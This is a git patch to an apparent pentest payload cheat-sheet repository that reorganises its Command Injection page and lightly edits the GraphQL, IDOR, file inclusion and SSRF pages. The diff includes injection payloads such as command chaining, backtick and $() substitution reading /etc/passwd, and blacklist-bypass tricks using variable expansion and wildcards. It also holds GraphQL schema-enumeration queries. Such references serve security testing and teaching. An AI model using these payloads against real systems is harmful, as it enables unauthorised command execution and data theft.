From 4d3ee90eec50d4ea78a804f948c419a6afadcf8c Mon Sep 17 00:00:00 2001 From: Swissky Date: Sun, 21 Apr 2019 19:50:50 +0200 Subject: [PATCH] Command injection rewritten --- Command Injection/README.md | 88 ++++++++++++------ File Inclusion/README.md | 4 +- GraphQL Injection/README.md | 10 +- .../{ => Images}/idor.png | Bin Insecure Direct Object References/README.md | 12 ++- Server Side Request Forgery/README.md | 2 +- 6 files changed, 78 insertions(+), 38 deletions(-) rename Insecure Direct Object References/{ => Images}/idor.png (100%) diff --git a/Command Injection/README.md b/Command Injection/README.md index 407373d..2bd4ed6 100644 --- a/Command Injection/README.md +++ b/Command Injection/README.md @@ -1,11 +1,40 @@ # Command Injection -Command injection is a security vulnerability that allows an attacker to execute arbitrary commands inside a vulnerable application. +> Command injection is a security vulnerability that allows an attacker to execute arbitrary commands inside a vulnerable application. +## Summary + +* [Tools](#tools) +* [Exploits](#exploits) + * [Basic commands](#basic-commands) + * [Chaining commands](#chaining-commands) + * [Inside a command](#inside-a-command) +* [Filter Bypasses](#filter-bypasses) + * [Bypass without space](#bypass-without-space) + * [Bypass with a line return](#bypass-with-a-line-return) + * [Bypass blacklisted words](#bypass-blacklisted-words) + * [Bypass with single quote](#bypass-with-a-single-quote) + * [Bypass with double quote](#bypass-with-a-double-quote) + * [Bypass with backslash and slash](#bypass-with-backslash-and-slash) + * [Bypass with $@](#bypass-with-----) + * [Bypass with variable expansion](#bypass-with-variable-expansion) + * [Bypass with wildcards](#bypass-with-wildcards) +* [Challenge](#challenge) +* [Time based data exfiltration](#time-based-data-exfiltration) +* [DNS based data exfiltration](#dns-based-data-exfiltration) +* [Polyglot command injection](#polyglot-command-injection) +* [References](#references) + + +## Tools + +* [commix - Automated All-in-One OS command injection and exploitation tool](https://github.com/commixproject/commix) ## Exploits -Normal command, execute the command and voila :p +### Basic commands + +Execute the command and voila :p ```powershell cat /etc/passwd @@ -15,23 +44,27 @@ bin:x:2:2:bin:/bin:/bin/sh sys:x:3:3:sys:/dev:/bin/sh ``` -Commands execution by chaining commands +### Chaining commands -```bash +```powershell original_cmd_by_server; ls original_cmd_by_server && ls original_cmd_by_server | ls original_cmd_by_server || ls Only if the first cmd fail ``` -Commands execution inside a command +### Inside a command ```bash original_cmd_by_server `cat /etc/passwd` original_cmd_by_server $(cat /etc/passwd) ``` -Commands execution without space - Linux +## Filter Bypasses + +### Bypass without space + +Works on Linux only. ```powershell swissky@crashlab:~/Www$ cat /usr/bin/zsh +echo whoami|$0 ``` -Bypass blacklisted word with variable expansion +#### Bypass with variable expansion ```powershell /???/??t /???/p??s?? @@ -110,20 +149,13 @@ cat ${test//hhh\/hm/} cat ${test//hh??hm/} ``` -Bypass blacklisted word with wildcards +#### Bypass with wildcards + ```powershell powershell C:\*\*2\n??e*d.*? # notepad @^p^o^w^e^r^shell c:\*\*32\c*?c.e?e # calc ``` -Bypass zsh/bash/sh blacklist - -```powershell -echo $0 --> /usr/bin/zsh -echo whoami|$0 -``` - ## Challenge Challenge based on the previous tricks, what does the following command do: diff --git a/File Inclusion/README.md b/File Inclusion/README.md index c261b13..2d8e3d4 100644 --- a/File Inclusion/README.md +++ b/File Inclusion/README.md @@ -1,8 +1,8 @@ # File Inclusion -The File Inclusion vulnerability allows an attacker to include a file, usually exploiting a "dynamic file inclusion" mechanisms implemented in the target application. +> The File Inclusion vulnerability allows an attacker to include a file, usually exploiting a "dynamic file inclusion" mechanisms implemented in the target application. -The Path Traversal vulnerability allows an attacker to access a file, usually exploiting a "reading" mechanism implemented in the target application +> The Path Traversal vulnerability allows an attacker to access a file, usually exploiting a "reading" mechanism implemented in the target application ## Summary diff --git a/GraphQL Injection/README.md b/GraphQL Injection/README.md index c997161..f7b0a75 100644 --- a/GraphQL Injection/README.md +++ b/GraphQL Injection/README.md @@ -1,17 +1,17 @@ # GraphQL injection -GraphQL is a query language for APIs and a runtime for fulfilling those queries with existing data. +> GraphQL is a query language for APIs and a runtime for fulfilling those queries with existing data. ## Exploit Identify an injection point -``` +```javascript ?param={__schema{types{name}}} ``` Check if errors are visible -``` +```javascript ?param={__schema} ?param={} ?param={thisdefinitelydoesnotexist} @@ -19,7 +19,7 @@ Check if errors are visible Enumerate Database Schema with the following GraphQL query -``` +```javascript fragment FullType on __Type { kind name @@ -119,7 +119,7 @@ query IntrospectionQuery { Enumerate the definition of interesting types using the following GraphQL query, replacing "User" with the chosen type -``` +```javascript {__type (name: "User") {name fields{name type{name kind ofType{name kind}}}}} ``` diff --git a/Insecure Direct Object References/idor.png b/Insecure Direct Object References/Images/idor.png similarity index 100% rename from Insecure Direct Object References/idor.png rename to Insecure Direct Object References/Images/idor.png diff --git a/Insecure Direct Object References/README.md b/Insecure Direct Object References/README.md index 22a49ff..6b4dba2 100644 --- a/Insecure Direct Object References/README.md +++ b/Insecure Direct Object References/README.md @@ -2,7 +2,14 @@ > Insecure Direct Object References occur when an application provides direct access to objects based on user-supplied input. As a result of this vulnerability attackers can bypass authorization and access resources in the system directly, for example database records or files. - OWASP -Tools : +## Summary + +* [Tools](#tools) +* [Exploit](#exploit) +* [Examples](#examples) +* [References](#references) + +## Tools - Burp Suite plugin Authz - Burp Suite plugin AuthMatrix @@ -10,7 +17,7 @@ Tools : ## Exploit -![https://lh5.googleusercontent.com/VmLyyGH7dGxUOl60h97Lr57F7dcnDD8DmUMCZTD28BKivVI51BLPIqL0RmcxMPsmgXgvAqY8WcQ-Jyv5FhRiCBueX9Wj0HSCBhE-_SvrDdA6_wvDmtMSizlRsHNvTJHuy36LG47lstLpTqLK](https://lh5.googleusercontent.com/VmLyyGH7dGxUOl60h97Lr57F7dcnDD8DmUMCZTD28BKivVI51BLPIqL0RmcxMPsmgXgvAqY8WcQ-Jyv5FhRiCBueX9Wj0HSCBhE-_SvrDdA6_wvDmtMSizlRsHNvTJHuy36LG47lstLpTqLK) +![https://lh5.googleusercontent.com/VmLyyGH7dGxUOl60h97Lr57F7dcnDD8DmUMCZTD28BKivVI51BLPIqL0RmcxMPsmgXgvAqY8WcQ-Jyv5FhRiCBueX9Wj0HSCBhE-_SvrDdA6_wvDmtMSizlRsHNvTJHuy36LG47lstLpTqLK](https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/master/Insecure%20Direct%20Object%20References/Images/idor.png) The value of a parameter is used directly to retrieve a database record. @@ -49,3 +56,4 @@ http://foo.bar/accessPage?menuitem=12 * [IDOR tweet as any user](http://kedrisec.com/twitter-publish-by-any-user/) by kedrisec * [Manipulation of ETH balance](https://www.vicompany.nl/magazine/from-christmas-present-in-the-blockchain-to-massive-bug-bounty) * [Viewing private Airbnb Messages](http://buer.haus/2017/03/31/airbnb-web-to-app-phone-notification-idor-to-view-everyones-airbnb-messages/) +* [Hunting Insecure Direct Object Reference Vulnerabilities for Fun and Profit (PART-1) - Mohammed Abdul Raheem - Feb 2, 2018](https://codeburst.io/hunting-insecure-direct-object-reference-vulnerabilities-for-fun-and-profit-part-1-f338c6a52782) \ No newline at end of file diff --git a/Server Side Request Forgery/README.md b/Server Side Request Forgery/README.md index 09012ae..b4079b3 100644 --- a/Server Side Request Forgery/README.md +++ b/Server Side Request Forgery/README.md @@ -1,6 +1,6 @@ # Server-Side Request Forgery -Server Side Request Forgery or SSRF is a vulnerability in which an attacker forces a server to perform requests on their behalf. +> Server Side Request Forgery or SSRF is a vulnerability in which an attacker forces a server to perform requests on their behalf. ## Summary